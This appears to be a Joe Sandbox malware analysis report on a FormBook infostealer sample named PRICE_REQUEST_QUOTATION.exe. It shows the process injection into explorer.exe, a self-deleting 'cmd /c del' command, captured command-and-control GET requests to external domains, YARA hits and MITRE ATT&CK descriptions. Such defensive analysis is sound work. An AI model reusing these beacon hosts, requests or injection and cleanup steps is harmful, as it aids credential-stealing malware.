74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49782	154.208.173.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:30.271586895 CEST	5799	OUT	GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.futurodr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49783	185.107.56.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:35.629242897 CEST	5800	OUT	GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.babeshotnud.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:36.039222956 CEST	5800	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Tue, 28 Sep 2021 06:05:35 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=18c140ce-2022-11ec-a1ad-e2db040519d9; path=/; domain=.babeshotnud.com; expires=Sun, 16 Oct 2089 09:19:43 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 3952 Parent PID: 5664

General

Start time:	08:03:33
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x400000
File size:	267109 bytes
MD5 hash:	85589170AF713A03CA622F94429C634A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: PRICE_REQUEST_QUOTATION.exe PID: 4684 Parent PID: 3952

General

Start time:	08:03:35
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x400000
File size:	267109 bytes
MD5 hash:	85589170AF713A03CA622F94429C634A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3472 Parent PID: 4684

General

Start time:	08:03:43
Start date:	28/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: autoconv.exe PID: 4484 Parent PID: 3472

General

Start time:	08:04:11
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xd10000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wscript.exe PID: 4960 Parent PID: 3472

General

Start time:	08:04:11
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x1060000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 4860 Parent PID: 4960

General

Start time:	08:04:14
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 496 Parent PID: 4860

General

Start time:	08:04:15
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets